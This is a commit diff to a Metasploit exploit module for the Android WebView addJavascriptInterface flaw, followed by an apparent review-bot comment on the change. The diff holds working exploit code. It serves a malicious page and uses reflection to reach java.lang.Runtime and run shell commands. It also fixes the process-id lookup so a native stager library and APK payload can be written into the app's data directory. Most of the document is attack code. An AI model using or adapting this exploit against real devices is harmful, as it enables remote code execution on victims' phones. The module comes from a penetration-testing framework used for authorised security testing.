
Commit 176cc84

committed
Remove BES and calculate the pid manually.
1 parent 46f7e60 commit 176cc84

1 file changed

+9
-9
lines changed


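--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -7,7 +7,7 @@
 
 class Metasploit3 < Msf::Exploit::Remote
 
-include Msf::Exploit::Remote::BrowserExploitServer
+include Msf::Exploit::Remote::HttpServer::HTML
 include Msf::Exploit::Remote::BrowserAutopwn
 
 autopwn_info({
@@ -77,15 +77,11 @@ def on_request_uri(cli, req)
 print_status("Serving javascript")
 send_response(cli, js, 'Content-type' => 'text/javascript')
 else
-super
+print_status("Serving exploit HTML")
+send_response_html(cli, html)
 end
 end
 
-def on_request_exploit(cli, req, browser)
-print_status("Serving exploit HTML")
-send_response_html(cli, html)
-end
-
 def ndkstager(stagename)
 localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so')
 data = File.read(localfile, :mode => 'rb')
@@ -99,16 +95,20 @@ def js
 // ensure that the object contains a native interface
 try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
 
+// get the pid
+var pid = obj.getClass().forName('android.os.Process').getMethod('myPid', null).invoke(null, null);
+
 // get the runtime so we can exec
 var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
 var runtime = m.invoke(null, null);
 var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
 var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}";
 
 // get the process name, which will give us our data path
-var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
+// $PPID does not seem to work on android 4.0, so we concat pids manually
+var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
 var ch, path = '/data/data/';
-while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
+while ((ch = p.getInputStream().read()) >= 0) { path += String.fromCharCode(ch); }
 var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
 var stagePath = path + '/#{stagename}.apk';
 var dexPath = path + '/#{stagename}.dex';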
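Review bot: The reason for swapping `Msf::Exploit::Remote::BrowserExploitServer` for `Msf::Exploit::Remote::HttpServer::HTML` in the first hunk lives only in the commit title ("Remove BES"), so a reader of the `include` lines cannot tell why this module is wired differently from the other browser modules that still sit on BES; a one-line comment above the include, such as `# Served through plain HttpServer::HTML rather than BrowserExploitServer; see commit 176cc84`, would record the decision in the file. The same applies to the second hunk, where the former `on_request_exploit(cli, req, browser)` hook is folded into the `else` branch of `on_request_uri` and the `browser` argument disappears, so whatever per-client handling BES supplied is presumably no longer applied — the module description should say so if that is the intent. Both `on_request_uri` and `js` begin outside their hunks, so the surrounding request dispatch and the start of the heredoc are not visible here.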
